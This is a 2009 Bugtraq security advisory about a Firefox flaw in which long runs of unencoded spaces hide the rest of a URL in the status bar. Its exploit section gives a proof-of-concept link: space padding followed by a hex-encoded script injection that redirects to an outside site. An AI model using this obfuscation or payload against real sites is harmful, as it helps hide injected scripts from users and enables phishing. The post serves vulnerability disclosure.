FIREFOX URL space character SPOOF
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: FIREFOX URL space character SPOOF
- From: xushaopei <xisigr@xxxxxxxxx>
- Date: Sun, 31 May 2009 09:14:43 +0800
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type:content-transfer-encoding; bh=wcuQ8tSKUuIDnOsteWOOyotc9U26pL+YAhMatdCUMt4=; b=KqbSa8wTaJc29RnNy3jbVdJ7CNqAvOUz8sa7bkmGZs7am5NWtw7oviktlrF8hefNZj B/Fw6Ge0OpEFoUjxSCQYnoZTMeoDWApnFsrlQPfYC1T3nVvF6Nm3qIwKt2SlGtXN4c3g buwjezQv565TGJV+3hGFP1YvADIdpmIcQtOTc=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type :content-transfer-encoding; b=mat6hYmxVbTP9vga2P/JckF3ZFGYzXuiDQu/+fI8XkDk/HmFdNt3uCxdRbTBAlPI2R vwd/0u37G5cqVaKrXvw06+Om9XtVY2V7ZDgdjN5mO+iTsrKYR3oqpygnffmxqJbihqaW 1FDKJo5sIG1eYi2s/Hvw91uFQp0Gr8AojNRX0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Vulnerability:
==============
Firefox browser address bar in dealing with the URL, the URL and the
status bar when the space character, there is no reasonable encoding
of the URL. Blank characters behind the malicious code will be hidden.
An attacker can construct a space with a long URL to the URL to
deceive.
Exploit:
==============
if other site there is a XSS vulnerability, such as:
<a
href='http://127.0.0.1/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%22%3E%3C%73%63%72%69%70%74%3E%6C%6F%63%61%74%69%6F%6E%3D%27%68%74%74%70%3A%2F%2F%67%2E%63%6E%27%3C%2F%73%63%72%69%70%74%3E'>test</a>
"http://127.0.0.1" which there is a XSS. When you put the code
above, save it as a HMTL file, and then run. You can see the Firefox
status bar, malicious code has been hidden, because of space.While
convenient for users to view, but space is shielding the user's eyes.
I think the Firefox status bar in dealing with the space and the
address bar, it should be URL encoded. At the same time, the focus on
convenience, but also to focus on safety.
===============
xisigr[topsec]
xisigr@xxxxxxxxx